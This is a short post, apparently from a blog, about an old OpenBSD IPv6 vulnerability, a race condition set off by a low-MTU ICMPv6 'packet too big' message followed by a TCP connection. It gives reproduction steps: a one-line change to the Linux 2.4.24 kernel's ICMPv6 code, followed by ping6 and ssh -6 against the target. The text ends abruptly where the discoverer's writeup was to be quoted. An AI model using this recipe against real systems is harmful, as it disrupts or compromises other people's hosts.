Don't see these very often (although it's certainly happened more than once, contrary to their claims) and only applies to OpenBSD systems on IPv6 networks, but still, interesting.

I'm not 100% clear on the details, but it appears to be some sort of race condition involving receiving a low-MTU ICMP datagram then initiating a TCP/IPv6 connection.

To exploit this vulnerability, you will need a Linux system. Edit Linux 2.4.24's net/ipv6/icmp.c and change the following:

case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

Recompile. Reboot.

ping6 openbsd
ssh -6 openbsd

The vulnerability discoverer's writeup is a little bit less than scholarly: